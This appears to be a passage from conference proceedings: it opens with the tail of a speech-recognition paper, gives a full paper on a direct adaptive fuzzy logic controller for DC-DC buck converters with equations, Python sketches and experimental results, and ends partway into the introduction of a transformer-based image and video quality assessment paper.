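        return []
    frames = [samples[i:i + frame_len] for i in range(0, len(samples), frame_len)]
    levels = [frame_db(f) for f in frames]
    threshold = max(levels) - margin_db
    segments, start = [], None
    for idx, level in enumerate(levels):
        if level >= threshold and start is None:
            start = idx * frame_len               # a non-silent region begins
        elif level < threshold and start is not None:
            segments.append((start, idx * frame_len))  # region ends at this silent frame
            start = None
    if start is not None:
        segments.append((start, len(samples)))
    return segments


# Hypothetical signal: a loud burst, silence, then a second burst.
signal = [0.5] * 800 + [0.0] * 800 + [0.4] * 400
print(split_on_silence(signal))
```

Compared with fixed five-second cuts, splitting at detected silences would keep words and phrases intact, at the cost of producing segments of uneven length.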
References
1. Cano, P., Koppenberger, M., Wack, N.: Content-based music audio recommendation, pp. 211–212, January 2005
2. Souli, S., Lachiri, Z.: Audio sounds classification using scattering features and support vectors machines for medical surveillance. Appl. Acoust. 130, 270–282 (2018)
3. Lasseck, M.: Audio-based bird species identification with deep convolutional neural networks, September 2018
4. Helander, M., Moody, T.S., Joost, M.G.: Chapter 14 - systems design for automated speech recognition. In: Helander, M. (ed.) Handbook of Human-Computer Interaction, North-Holland, Amsterdam, pp. 301–319 (1988). https://www.sciencedirect.com/science/article/pii/B9780444705365500191
5. Zajechoswski, M.: Automatic speech recognition (ASR) software - an introduction. Usability Geek (2005). https://usabilitygeek.com/automatic-speech-recognition-asr-software-an-introduction/
6. Hernandez, A., Reyes Jr., F., Fajardo, A.: Convolutional neural network for automatic speech recognition of Filipino language. Int. J. Adv. Trends Comput. Sci. Eng. 9, 34–40 (2020)
7. Cai, C., Briones, M.R., Te, E., Pascual, R.: Development of an automatic speech recognizer for Filipino-speaking children, November 2020
8. Krestel, R., Fankhauser, P., Nejdl, W.: Latent Dirichlet allocation for tag recommendation, pp. 61–68, January 2009
9. Wang, S., Lo, D., Vasilescu, B., Serebrenik, A.: EnTagRec++: an enhanced tag recommendation system for software information sites. Empir. Softw. Eng. 23, 04 (2018)
10. Ramage, D., Hall, D., Nallapati, R., Manning, C.D.: Labeled LDA: a supervised topic model for credit attribution in multi-labeled corpora. In: Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing. Association for Computational Linguistics, Singapore, pp. 248–256, August 2009. https://aclanthology.org/D09-1026
11. Liu, Y., Du, F., Sun, J., Jiang, Y.: iLDA: an interactive latent Dirichlet allocation model to improve topic quality. J. Inf. Sci. 46(1), 23–40 (2020). https://doi.org/10.1177/0165551518822455
12. Koltcov, S., Nikolenko, S.I., Koltsova, O., Bodrunova, S.: Stable topic modeling for web science: granulated LDA. In: Proceedings of the 8th ACM Conference on Web Science, Ser. WebSci 2016. Association for Computing Machinery, New York, NY, USA, pp. 342–343 (2016). https://doi.org/10.1145/2908131.2908184
13. Conneau, A., Baevski, A., Collobert, R., Mohamed, A., Auli, M.: Unsupervised cross-lingual representation learning for speech recognition. arXiv preprint arXiv:2006.13979 (2020)
14. Rivière, M., Joulin, A., Mazaré, P.-E., Dupoux, E.: Unsupervised pretraining transfers well across languages. arXiv, abs/2002.02848 (2020)
15. Grosman, J.: Xlsr wav2vec2 English by Jonatas Grosman (2021). https://huggingface.co/jonatasgrosman/wav2vec2-large-xlsr-53-english
16. Seyfrath, S., Zhao, P.: Evaluating an automatic speech recognition service. AWS Machine Learning Blog (2020). https://aws.amazon.com/blogs/machine-learning/evaluating-an-automatic-speech-recognition-service/
A Novel Adaptive Fuzzy Logic Controller for DC-DC Buck Converters
Thuc Kieu-Xuan1 and Duc-Cuong Quach2(B)
1 Faculty of Electronic Engineering, Hanoi University of Industry, Hanoi, Vietnam [email protected]
2 Faculty of Electrical Engineering, Hanoi University of Industry, Hanoi, Vietnam [email protected]
https://www.haui.edu.vn
Abstract. This paper is concerned with the design and implementation of a direct adaptive fuzzy logic controller (DAFLC) that stabilizes the output voltage of a DC-DC buck converter under input voltage variation, load changes, and uncertainty in the system model. The DAFLC is designed with Takagi and Sugeno's fuzzy logic system and Lyapunov stability theory to give the DC-DC buck converter remarkable stability and outstanding transient quality. Experimental results show that the DC-DC buck converter with the proposed DAFLC performs effectively in terms of stability and transient quality. Moreover, the proposed system does not require a mathematical model of the converter.
Keywords: DC-DC buck converter · Takagi and Sugeno's fuzzy logic system · Adaptive fuzzy logic controller · Direct adaptive fuzzy logic controller
1 Introduction
Traditional linear control algorithms such as PI and PID have long been used in DC-DC converters because of their simplicity. However, they require an exact mathematical model of the system and give the DC-DC converter poor dynamic behavior. Recently, there has been increasing interest in developing efficient control algorithms that improve the dynamic behavior of DC-DC converters, using a discrete sliding mode controller [1], a fuzzy logic controller (FLC) [2], an adaptive fuzzy logic controller (AFLC) [3], or a neuro-fuzzy controller (NFC) [4]. Fuzzy logic based controllers can be useful in situations where (i) there is no exact mathematical model of the system and (ii) there are experienced operators who can satisfactorily control the plant and provide qualitative control rules in terms of vague and fuzzy sentences [5,6]. There are many practical situations where both (i) and (ii) are true [7–10].
In this paper, we introduce a systematic approach to constructing a direct adaptive fuzzy logic controller (DAFLC) for DC-DC buck converters. A Takagi and Sugeno's fuzzy logic system with adaptive inference rules is used to directly estimate the optimal duty ratio of the DC-DC buck converter's control signal based on Lyapunov stability theory. Therefore, the DC-DC buck converter can regulate its output voltage without knowledge of the mathematical model or of the variation of the input voltage. Experimental results show that the proposed converter performs well in terms of stability and transient quality.
The organization of the paper is as follows: In Sect. 2, the system model is described. The DAFLC is proposed in Sect. 3. The implementation of the proposed control algorithm is given in Sect. 4. Experimental results are presented in Sect. 5. Finally, in Sect. 6, we conclude the paper.
Fig. 1. System model of the DC-DC buck converter with DAFLC
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 446–454, 2023. https://doi.org/10.1007/978-3-031-28073-3_32
2 System Model
The considered system consists of a DC-DC buck converter controlled by a DAFLC, as shown in Fig. 1. The desired output voltage is denoted by $y_m$ and the output voltage on the load by $V_o$. Based on the output voltage and the error between the output voltage and the desired output voltage, the DAFLC estimates the optimal PWM duty cycle for the IGBT of the DC-DC buck converter so that the output voltage tracks the desired output voltage under changing load and varying input voltage. The DC-DC buck converter is illustrated in Fig. 2, and its model in continuous current mode is shown in Fig. 3 [11–13]. The transfer functions of this converter are:
$$G_{Vd}(s) = \frac{\hat{V}_o(s)}{\hat{d}(s)} = V_g(s)\,G_0 \tag{1}$$
$$G_{Vg}(s) = \frac{\bar{V}_o(s)}{V_g(s)} = \frac{\bar{D}R}{r_L + R}\,G_0 \tag{2}$$
$$Z_{out}(s) = \frac{\hat{V}_i(s)}{i(s)} = \frac{r_c R}{r_c + R}\,G_1 \tag{3}$$
$$D = \bar{D} + \hat{d} \tag{4}$$
where
$$G_0 = \frac{r_c C s + 1}{LC\,\dfrac{r_c + R}{r_L + R}\,s^2 + \left(r_c C + \dfrac{r_L R C + L}{r_L + R}\right)s + 1}$$
and
$$G_1 = \frac{(LCs + r_L C)(LCs + L/r_c)}{LCs^2 + \left(r_L C + \dfrac{r_c R C + L}{r_c + R}\right)s + \dfrac{r_L + R}{r_c + R}}$$
Fig. 2. Diagram of the DC-DC buck converter
Fig. 3. Block diagram of the DC-DC buck converter
Here $D$, $R$, $r_c$, $C$, $r_L$, $L$ and $V_g$ are the PWM duty cycle for the IGBT, the load resistance, the capacitor's resistance, the capacitor's capacitance, the inductor's resistance, the inductor's inductance and the input voltage (i.e., the supply voltage), respectively. The system model clearly depends on the capacitor's resistance $r_c$, the inductance $L$, the PWM duty cycle $D$, the load resistance $R$ and even the input voltage $V_g$. From (1), (2), (3), and (4), the control object is a second-order SISO system with input $D$ and output voltage $V_o$, and it can be written as:
$$\begin{cases} \ddot{V}_o = a_0 \dot{V}_o + a_1 V_o + bD \\ y = V_o \end{cases} \tag{5}$$
where $a_0$, $a_1$ and $b$ are unknown positive real numbers:
$$a_0 = \frac{r_c r_L C + r_c C R + r_L R C + L}{LC(r_c + R)}; \quad a_1 = \frac{r_L + R}{LC(r_c + R)}; \quad b = \frac{V_g R}{LC(r_c + R)}.$$
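To make the dependence of the model on the circuit parameters concrete, the coefficients defined after Eq. (5) can be evaluated numerically. The following is a minimal sketch. The function name `buck_coefficients` and the values of $r_c$, $C$, $r_L$ and $L$ are hypothetical and chosen only for illustration; $R = 50\ \Omega$ and $V_g = 310$ V match one of the experimental conditions reported later.

```python
def buck_coefficients(R, r_c, C, r_L, L, V_g):
    """Return (a0, a1, b) as written after Eq. (5).

    R   : load resistance [ohm]
    r_c : capacitor series resistance [ohm]
    C   : capacitance [F]
    r_L : inductor series resistance [ohm]
    L   : inductance [H]
    V_g : input (supply) voltage [V]
    """
    denom = L * C * (r_c + R)
    a0 = (r_c * r_L * C + r_c * C * R + r_L * R * C + L) / denom
    a1 = (r_L + R) / denom
    b = V_g * R / denom
    return a0, a1, b


# r_c, C, r_L and L below are hypothetical values, not taken from the paper.
a0, a1, b = buck_coefficients(R=50.0, r_c=0.05, C=1e-3, r_L=0.1, L=1e-3, V_g=310.0)
print(f"a0 = {a0:.4g}, a1 = {a1:.4g}, b = {b:.4g}")

# Halving the load resistance changes all three coefficients, which is why a
# fixed-gain controller tuned for one load may behave differently at another.
print(buck_coefficients(R=25.0, r_c=0.05, C=1e-3, r_L=0.1, L=1e-3, V_g=310.0))
```

All three coefficients move with $R$ and $b$ scales with $V_g$, which is the motivation for estimating the control signal adaptively rather than from fixed model parameters.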
3 The Proposed DAFLC
For mathematical convenience, let $\mathbf{x} = [x_1, x_2]^T = [x, \dot{x}]^T$, where $x$ is the output voltage $V_o$ of the DC-DC buck converter. We can rewrite (5) as follows:
$$\begin{cases} \dot{x}_1 = x_2 \\ \dot{x}_2 = f(\mathbf{x}) + bu \\ y = x_1 \end{cases} \tag{6}$$
where $f(\mathbf{x}) = a_0 \dot{x} + a_1 x$ and $u = D$. The optimal control value is determined as
$$u^* = \frac{1}{b}\left(\dot{x}_2 - f(\mathbf{x})\right) = \frac{1}{b}\left(\ddot{x} - f(\mathbf{x})\right) \tag{7}$$
A Takagi-Sugeno fuzzy logic system is used to produce a signal $u(\mathbf{x}|\theta)$ that approximates $u^*$, under the condition that $b$ is a positive finite number and $f(\mathbf{x})$ is a bounded continuous function [10,11]. The inference rules of the proposed DAFLC have the following form:
$R^{1}_{1,1}$: IF $x_1$ is $V_1$ and $x_2$ is $dV_1$ THEN $u_{1,1} = \theta_{1,1}$
$R^{2}_{1,2}$: IF $x_1$ is $V_1$ and $x_2$ is $dV_2$ THEN $u_{1,2} = \theta_{1,2}$
...
$R^{k=i+m(j-1)}_{i,j}$: IF $x_1$ is $V_i$ and $x_2$ is $dV_j$ THEN $u_{i,j} = \theta_{i,j}$
...
$R^{l=m \times n}_{m,n}$: IF $x_1$ is $V_m$ and $x_2$ is $dV_n$ THEN $u_{m,n} = \theta_{m,n}$
where $V_i$ ($1 \le i \le m$) and $dV_j$ ($1 \le j \le n$) are fuzzy sets of the variables $x_1$ and $x_2$, fuzzified by the membership functions $\mu_i^{x_1}$ and $\mu_j^{x_2}$, and $\theta$ is the parameter vector of the fuzzy system. The output value of the fuzzy logic system is obtained as follows:
$$u(\mathbf{x}|\theta) = \frac{\sum_{i=1}^{m}\sum_{j=1}^{n} \theta_{i,j}\,\mu_i^{x_1}\mu_j^{x_2}}{\sum_{i=1}^{m}\sum_{j=1}^{n} \mu_i^{x_1}\mu_j^{x_2}} \tag{8}$$
Denote the parameter update vector by $\xi(\mathbf{x}) = [\xi_1(\mathbf{x}), \xi_2(\mathbf{x}), \ldots, \xi_{m \times n}(\mathbf{x})]^T$ and the parameter vector by $\theta = [\theta_1, \theta_2, \ldots, \theta_{m \times n}]^T$, in which
$$\theta_{i+m(j-1)} = \theta_{i,j}, \qquad \xi_{i+m(j-1)} = \frac{\mu_i^{x_1}\mu_j^{x_2}}{\sum_{i=1}^{m}\sum_{j=1}^{n} \mu_i^{x_1}\mu_j^{x_2}}$$
The control signal $u(\mathbf{x}|\theta)$ can then be calculated simply as follows:
$$u(\mathbf{x}|\theta) = \theta^T \xi(\mathbf{x}) \tag{9}$$
The system error is defined as $e = y_m - y$, and the error vector is $\mathbf{e} = [e, \dot{e}]^T$. The error differential equation for a second-order system has the form $\ddot{e} + k_1 \dot{e} + k_2 e = 0$. The characteristic matrix of the system error can be defined as $A = [0, 1; -k_2, -k_1]$. The parameter vector of the fuzzy system can be adjusted by using the Lyapunov stability criterion as follows [5,6,10]:
$$\theta(t) = \gamma \int_0^t \mathbf{e}^T \mathbf{p}_2\, \xi(\mathbf{x})\, dt + \theta(0) \tag{10}$$
Table 1. System configuration
No | Parameter | Value | Normalized value | Normalized function
1 | Output $x_1$ | [0, 400] V | [0, 4000] | [0, 200]; $\mu_i^{x_1}$
2 | Derivative of output $x_2$ | [−20000, 20000] V/s | [−20, 20] | [−20, 20]; $\mu_j^{x_2}$
3 | Control value $u$ | [0, 1] | [−2047, 2047] |
Fig. 4. Fuzzy sets of output voltage and derivative of the output voltage
In (10), $\gamma$ is a positive update coefficient and $\mathbf{p}_2$ is the last column of the $2 \times 2$ matrix $P$ satisfying the following Lyapunov equation:
$$A^T P + PA = -Q \tag{11}$$
where $Q$ is a positive definite symmetric matrix.
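The fuzzy output in Eqs. (8) and (9) can be sketched in a few lines. The code below is an illustration under stated assumptions, not the authors' implementation: it assumes evenly spaced isosceles triangular membership functions (five per input), takes the input ranges [0, 200] and [−20, 20] from the last column of Table 1 as read here, and uses hypothetical function names.

```python
def triangle(x, center, half_width):
    """Isosceles triangular membership function centred at `center`."""
    return max(0.0, 1.0 - abs(x - center) / half_width)


def memberships(x, lo, hi, count=5):
    """Degrees of membership of x in `count` evenly spaced triangular sets on [lo, hi]."""
    step = (hi - lo) / (count - 1)
    x = min(max(x, lo), hi)  # clamp so that at least one set always fires
    return [triangle(x, lo + i * step, step) for i in range(count)]


def basis(x1, x2, range1=(0.0, 200.0), range2=(-20.0, 20.0), m=5, n=5):
    """Normalised firing strengths xi_l with l = i + m*(j-1) for 1-based i, j."""
    mu1 = memberships(x1, range1[0], range1[1], m)
    mu2 = memberships(x2, range2[0], range2[1], n)
    # j is the outer loop, so the 0-based list position is i + m*(j-1) - 1.
    products = [mu1[i] * mu2[j] for j in range(n) for i in range(m)]
    total = sum(products)
    return [p / total for p in products]


def control(theta, xi):
    """Eq. (9): u = theta^T xi."""
    return sum(t * w for t, w in zip(theta, xi))


theta = [0.5] * 25           # hypothetical rule consequents (duty ratios)
xi = basis(x1=120.0, x2=-3.0)
print(sum(xi))               # the firing strengths are normalised
print(control(theta, xi))    # equals 0.5 because every consequent is 0.5
```

Because the firing strengths are normalised, the controller output is a convex combination of the rule consequents $\theta_l$, so adapting $\theta$ directly reshapes the duty ratio surface.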
4 Implementation of the DAFLC Using ARM Embedded Platform
In this section, we briefly describe how the proposed DAFLC is set up on the STM32F407VGT6 microcontroller from ST Microelectronics [14].
4.1 Fuzzification and Defuzzification
The Takagi-Sugeno fuzzy system based DAFLC has two inputs: the output voltage, denoted by $x_1$, and the derivative of the output voltage, denoted by $x_2$. These input variables are each fuzzified by five isosceles triangular fuzzy sets, as shown in Fig. 4. System parameters are normalized as shown in Table 1. From (9), the defuzzified value at the $k$-th sampling time can be determined as follows:
$$u(\mathbf{x}(k)|\theta(k)) = \theta^T(k)\,\xi(\mathbf{x}(k)) \tag{12}$$
4.2 Inference Rule Update
From (10), the fuzzy inference rules are updated by adjusting the parameter vector according to the following discrete equations [9,10]:
$$\begin{cases} \Delta\theta_l(k) = \gamma\,\mathbf{e}^T(k)\,\mathbf{p}_2\,\xi_l(\mathbf{x}(k)) \\ \theta_l(k+1) = \theta_l(k) + \Delta\theta_l(k) + \theta_l(0) \end{cases} \tag{13}$$
where
$$\xi_l(\mathbf{x}(k)) = \frac{\mu_i^{x_1}(k)\,\mu_j^{x_2}(k)}{\sum_{i=1}^{5}\sum_{j=1}^{5} \mu_i^{x_1}(k)\,\mu_j^{x_2}(k)}; \quad l = i + 5(j-1); \quad \theta_l(0) = 0,\ \forall l = 1, 2, \ldots, m \times n.$$
In the experiments, the DAFLC parameters are set as follows: $\gamma = 5$; the characteristic equation of the error is chosen as $\ddot{e} + 10\dot{e} + 50e = 0$, so $A = [0, 1; -50, -10]$; $Q = [100, 0; 0, 150]$. From Eq. (11) we have $P = [390, 1; 1, 7.6]$, so $\mathbf{p}_2 = [1, 7.6]^T$. The control algorithm of the DAFLC and the experimental model are shown in Fig. 5.
Fig. 5. Operation algorithm of the DAFLC and experimental system
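The value of $P$ quoted above can be checked by solving Eq. (11) by hand for the companion-form matrix $A = [0, 1; -k_2, -k_1]$, and the result can then be used in one step of the update rule (13). The sketch below is illustrative: the function names are hypothetical, the closed-form solution assumes a symmetric $P$ and this specific form of $A$, and the error values in the usage example are made up.

```python
def solve_lyapunov_companion(k1, k2, q11, q22, q12=0.0):
    """Solve A^T P + P A = -Q for symmetric P, with A = [[0, 1], [-k2, -k1]].

    Writing out the three independent entries of A^T P + P A gives
      (1,1): -2*k2*p12            = -q11
      (2,2):  2*p12 - 2*k1*p22    = -q22
      (1,2):  p11 - k1*p12 - k2*p22 = -q12
    """
    p12 = q11 / (2.0 * k2)
    p22 = (q22 + 2.0 * p12) / (2.0 * k1)
    p11 = k1 * p12 + k2 * p22 - q12
    return [[p11, p12], [p12, p22]]


def update_theta(theta, xi, e, e_dot, p2, gamma):
    """One step of Eq. (13), using theta_l(0) = 0 as stated in the text."""
    scale = gamma * (e * p2[0] + e_dot * p2[1])  # gamma * e^T p2
    return [t + scale * w for t, w in zip(theta, xi)]


# Values from the text: e'' + 10 e' + 50 e = 0 and Q = diag(100, 150).
P = solve_lyapunov_companion(k1=10.0, k2=50.0, q11=100.0, q22=150.0)
p2 = [P[0][1], P[1][1]]  # last column of P
print(P, p2)             # agrees with P = [390, 1; 1, 7.6] up to rounding

# Hypothetical single update: only rule 13 (0-based index 12) is active.
xi = [0.0] * 25
xi[12] = 1.0
theta = update_theta([0.0] * 25, xi, e=2.0, e_dot=0.0, p2=p2, gamma=5.0)
print(theta[12])
```

Only the consequents of rules that are currently firing are changed, and the size of the change is proportional to the weighted tracking error $\mathbf{e}^T \mathbf{p}_2$.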
5 Experimental Results
The experimental system is shown in Fig. 5. The input voltage of the system is supplied from a single-phase 220 V/50 Hz AC power source through a bridge rectifier with a 1.000 µF/450 V filtering capacitor. Load current, input voltage, output voltage and reference voltage are measured independently by an NI-USB 6009 data acquisition card and monitored on a PC using Simulink.
5.1 Case 1: Experiment with Reference Voltage Value 200 V, Constant Load R = 50 Ω
As shown in Fig. 6, although the supply source $V_g$ has relatively strong ripples, the system response tracks the reference value $y_m$ with a mean accuracy of 1.5%. Additionally, the dynamic quality of the system is outstanding, with a transient time of 0.06 s and a maximum overshoot of 10%. These results demonstrate the good control ability of the DAFLC when the model parameters change.
Fig. 6. Responses of the system in case 1
5.2 Case 2: Experiments with Steeply Rising Reference Voltage Values from 50 V to 200 V, with the Load Resistance Fixed at 50 Ω
The experimental results depicted in Fig. 7 show that: i) the voltage $V_o$ is stable and quickly tracks the reference value $y_m$; ii) the steady-state error $e_{ss}$ of the system is very small: the minimum $e_{ss}$ is 1% and the maximum $e_{ss}$ is only 1.5%.
Fig. 7. Responses of the systems in case 2
5.3 Case 3: Experiment with Varying Load and Input Voltage
Fig. 8. Responses of the systems in case 3
Table 2. Experimental results in case 3
No | Time | Testing condition | Voltage $V_o$ | Current I
1 | [0, 0.2] s | R = 50 Ω, $V_g$ = 310 V, $y_m$ = 100 V | 100 V, $e_{ss}$ = 0.5% | 2.00 A
2 | [0.2, 0.4] s | R = 25 Ω, $V_g$ = 310 V, $y_m$ = 100 V | 100 V, $e_{ss}$ = 1.5% | 4.00 A
3 | [0.4, 0.5] s | R = 16.7 Ω, $V_g$ = 310 V, $y_m$ = 100 V | 100 V, $e_{ss}$ = 2.0% | 6.00 A
4 | [0.5, 0.9] s | R = 16.7 Ω, $V_g$ = 310 V, $y_m$ = 50 V | 50 V, $e_{ss}$ = 1.5% | 3.00 A
5 | [0.9, 1.2] s | R = 16.7 Ω, $V_g$ = 310 V, $y_m$ = 150 V | 150 V, $e_{ss}$ = 2.5% | 8.98 A
Experimental results in Case 3 are shown in Table 2 and depicted in Fig. 8. From Table 2 and Fig. 8, it can be seen that:
i) The transient response of the system is very good. The output $y(t)$ closely follows $y_m(t)$ under variations of the load and of the supply voltage $V_g(t)$. When the voltage $y(t)$ decreases (t = 0.5 s), the settling time is longer and the maximum overshoot is higher because of the inertial nature of the DC-DC buck converter. This problem becomes worse at low load and high voltage. The effect is small if the capacitor's capacitance is small and the load is high.
ii) When the load resistance $R$ changes, the response $V_o$ of the system tracks the reference signal $y_m(t)$. The system is stable according to Lyapunov stability theory.
iii) The steady-state error of the control system is in the range of [0.5, 2.5]%, as shown in Table 2. In practice, a rectifier filter capacitor with larger capacitance can be used to obtain a smaller steady-state error.
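As a quick plausibility check on Table 2, the reported load currents can be compared with Ohm's law applied to the nominal output voltage and load resistance of each row. This is only a sketch: it uses the nominal voltages rather than measured waveforms, so deviations of a few hundredths of an ampere are expected from rounding and from the steady-state error.

```python
# (load resistance [ohm], nominal output voltage [V], reported current [A]) per row of Table 2
rows = [
    (50.0, 100.0, 2.00),
    (25.0, 100.0, 4.00),
    (16.7, 100.0, 6.00),
    (16.7, 50.0, 3.00),
    (16.7, 150.0, 8.98),
]


def max_current_deviation(table):
    """Largest absolute difference between V/R and the reported current."""
    return max(abs(v / r - i) for r, v, i in table)


for r, v, i_reported in rows:
    print(f"R = {r:5.1f} ohm, V = {v:5.1f} V, V/R = {v / r:5.2f} A, reported = {i_reported:5.2f} A")

print(f"largest deviation: {max_current_deviation(rows):.3f} A")
```

The nominal values agree with the reported currents to within about 0.01 A, which is consistent with the table entries being rounded.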
6 Conclusions
In this paper, a direct adaptive fuzzy logic controller for DC-DC buck converters has been proposed and implemented on an ARM Cortex M4-based platform. The DAFLC is able to regulate the output voltage of the DC-DC buck converter under variations of the load as well as of the input voltage. Experimental results have demonstrated the effectiveness of the proposed controller and showed satisfactory results without requiring a human expert or an exact mathematical model of the system.
This research was partially supported by Hanoi University of Industry under research project coded 26-2020-RD/HD-DHCN.
References
1. Dehri, K., Bouchama, Z., Nouri, A.S., Essounbouli, N.: Input-output discrete integral sliding mode controller for DC-DC buck converter. In: Proceedings of the 15th International Multi-Conference on Systems Signals and Devices, Yasmine Hammamet, Tunisia, 19–22 March 2018, pp. 100–123 (2018)
2. Ilka, R., Gholamian, S.A., Rezaie, B., Rezaie, A.: Fuzzy control design for a DC-DC buck converter based on recursive least square algorithm. Int. J. Comput. Sci. Appl. (IJCSA) 2(6) (2012)
3. Elmas, C., Deperlioglu, O., Sayan, H.H.: Adaptive fuzzy logic controller for DC-DC converters. Expert Syst. Appl. 36(2P1), 1540–1548 (2009)
4. Emami, S.A., Poudeh, M.B., Eshtehardiha, S., Moradiyan, M.: An adaptive neuro-fuzzy controller for DC-DC converter. In: Proceedings of the International Conference on Control, Automation and Systems, Seoul, Korea (2008)
5. Wang, L.X.: A Course in Fuzzy Systems and Control. Prentice-Hall International Inc. (1996)
6. Wang, L.X.: Stable adaptive fuzzy control of nonlinear systems. IEEE Trans. Fuzzy Syst. 1(2), 146–155 (1993)
7. Bellomo, D., Naso, D., Babuska, R.: Adaptive fuzzy control of a non-linear servodrive: theory and experimental results. Eng. Appl. Artif. Intell. 21, 846–857 (2008)
8. Labiod, S., Guerra, T.M.: Adaptive fuzzy control of a class of SISO nonaffine nonlinear systems. Fuzzy Sets Syst. 158, 1126–1137 (2007)
9. Ougli, A.E., Lagrat, I., Boumhidi, I.: Direct adaptive fuzzy control of nonlinear systems. ICGST-ACSE J. 8(II) (2008). ISSN 1687-4811
10. Quach, D.-C., Huang, S., Yin, Q., Zhou, C.: An improved direct adaptive fuzzy controller for an uncertain DC motor speed control system. TELKOMNIKA Indon. J. Electr. Eng. 11(2), 1083–1092 (2013)
11. Zhang, N., Li, D.: Loop response considerations in peak current mode buck converter design. TI technical report, SLVAE09A, Revised 2021 (2018)
12. Vishnu, D.: Modelling an adaptive control of a DC-DC Buck converter. Master thesis, Department of Electrical Engineering, National Institute of Technology, Rourkela (2015)
13. Yang, R.: Modeling and control for a current-mode buck converter with a secondary LC filter. Analog Dialogue 52(10) (2018)
14. The datasheet of STM32F4xx Microcontroller. https://www.st.com/resource/en/datasheet/dm00037051.pdf
Visual Mechanisms Inspired Efficient Transformers for Image and Video Quality Assessment
Junyong You1(B) and Zheng Zhang2
1 NORCE Norwegian Research Centre, Bergen, Norway [email protected]
2 Hong Kong University of Science and Technology, Hong Kong, China [email protected]
Abstract. Visual (image, video) quality assessment can be modelled by visual features in different domains, e.g., the spatial, frequency, and temporal domains. Perceptual mechanisms in the human visual system (HVS) play a crucial role in the generation of quality perception. This paper proposes a general framework for no-reference visual quality assessment using efficient windowed transformer architectures. A lightweight module for multi-stage channel attention is integrated into the Swin (shifted window) Transformer. Such a module can represent appropriate perceptual mechanisms in image quality assessment (IQA) to build an accurate IQA model. Meanwhile, representative features for image quality perception in the spatial and frequency domains can also be derived from the IQA model, which are then fed into another windowed transformer architecture for video quality assessment (VQA). The VQA model efficiently reuses attention information across local windows to tackle the expensive time and memory complexity of the original transformer. Experimental results on both large-scale IQA and VQA databases demonstrate that the proposed quality assessment models outperform other state-of-the-art models by large margins.
Keywords: Image quality assessment · No-reference visual quality assessment · Transformer · Video quality assessment · Visual mechanisms
1 Introduction
With the rapid development of mobile devices and social media platforms, e.g., TikTok and Instagram, we have seen an explosion of user-generated content (UGC) in the form of images and videos. Evaluating the perceived quality of UGC images and videos has become a critical issue. Traditionally, well-developed methods for visual quality assessment have focused on the full-reference or reduced-reference scenario, in which a distorted visual signal is assessed by fully or partially comparing it with the original undistorted signal [1]. However, no reference information is available for UGC images and videos, as the distortions are often introduced by unprofessional production methods, poor capturing environments and equipment, or other authentic artifacts. Thus, no-reference (NR) quality assessment naturally becomes the only choice for UGC quality assessment.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 455–473, 2023. https://doi.org/10.1007/978-3-031-28073-3_33
Early studies on NR image quality assessment (IQA) or video quality assessment (VQA) often targeted certain distortion types, e.g., compression and transmission artefacts [2, 3]. Later, in order to build general-purpose quality assessment models, feature engineering was widely used [4, 5]. Representative features relevant to quality perception are derived from visual signals in different domains, e.g., the spatial, frequency and temporal domains. The features are then combined into a quality prediction using analytic approaches, machine learning methods, or both. In [4], a widely referenced IQA model (BRISQUE) derives scene statistics of locally normalized luminance coefficients in the spatial domain, from which a support vector regressor (SVR) predicts an image quality score. Saad et al. [5] employed an analytic model (VBLIINDS) for VQA based on intrinsic statistical regularities that mimic the distortions occurring in natural videos. To reduce the complexity of processing long video sequences, Korhonen [6] proposed to model quality related video features on two levels: low complexity features on the full video and high complexity features on representative frames only. The features are then fed into an SVR for quality evaluation. As deep learning has come to dominate computer vision tasks, it has also attracted research interest in image and video quality assessment. Earlier works on deep IQA models often follow the approach used in image classification, e.g., adapting CNN classification models for quality prediction. In [7], AlexNet pretrained on ImageNet is fine-tuned and used to extract image features for IQA. Hosu et al. [8] added several fully connected layers on top of InceptionResNetV2 to develop an IQA model, which shows promising performance on their dataset KonIQ-10k.
However, a potential issue with direct adaption of classification models for IQA lies in that image rescaling is required, as those classification models often accept fixed input sizes. Such image rescaling might not significantly affect the classification task, while it can have dramatic influence on perceived image quality. For example, viewers often prefer to watch high-dimension visual contents on large screens than low-resolution signals on small screens. Thus, image rescaling should be avoided in IQA models to prevent from introducing extra unnecessary distortions. On the other hand, as a subjective concept, visual quality perception can be essentially determined by the intrinsic mechanisms in human visual system (HVS). For example, selective spatial attention can guide the quality assessment process. Viewers might pay different attention to different visual stimuli driven by the contents, viewing tasks and other factors in an overt or covert manner [9, 10]. In addition, contrast sensitivity function (CSF) describes that the HVS presents different sensitivities to individual components in the visual stimuli [11, 12]. It also affects quality perception as certain distortions do not trigger viewers’ perception, e.g., a just noticeable distortion model is inspired by CSF [13]. As the transformer model can appropriately represent the selective attention mechanism, it has been applied in IQA. You et al. [14] proposed a hybrid model (TRIQ) using a transformer encoder based on features derived from a CNN backbone. Furthermore, considering that both high-resolution and low-resolution features contain essential information for image quality perception, several models have been developed based on a multi-scale architecture. Ke et al. [15] proposed a multi-scale image quality transformer (MUSIQ) based on 3D spatial embedding and scale embedding at different granularities. In [16], a hierarchical module simulating spatial and channel
attention is integrated into CNN backbone for multi-scale quality prediction. Wu et al. [17] proposed a cascaded architecture (CaHDC) to represent the hierarchical perception mechanism in HVS, and then pool the features extracted at different scales. In [18], a hyper network (hyperIQA) is built by aggregating multi-scale image features capturing both local and global distortions in a self-adaptive manner. Compared to applying deep networks for IQA, VQA still does not widely benefit from the advances of deep learning models, due to the complexity and diversity of modelling spatial-temporal video characteristics. It is difficult to directly feed a long video sequence into deep networks consuming tremendous computing resources. For example, a rough estimation indicates that ResNet50-3D on 10s video (1024x768 @25FPS) requires ~ 14GB memory. Existing deep learning driven video models, e.g., for video classification, mainly perform frame down-scaling on short sequences to reduce the resource requirements [19]. Considering that image rescaling should be avoided in visual quality assessment, a feasible approach is to derive quality features from video frames first and then pool them in the temporal domain. This is actually a mainstream work in VQA [20–24]. For example, pretrained CNNs are often used to derive frame features and popular recurrent neural networks (RNN) or regressors are employed for temporal pooling, e.g., LSTM [20, 21], GRU [22], 3D-CNN [23], and SVR [24]. However, those large-scale image datasets to pretrain CNNs were built for other purposes than quality assessment. Image features derived by the pretrained CNNs might not well represent quality related properties. Several studies intend to derive frame features by dedicated IQA models instead of pretrained CNNs, e.g., see [25, 26]. 
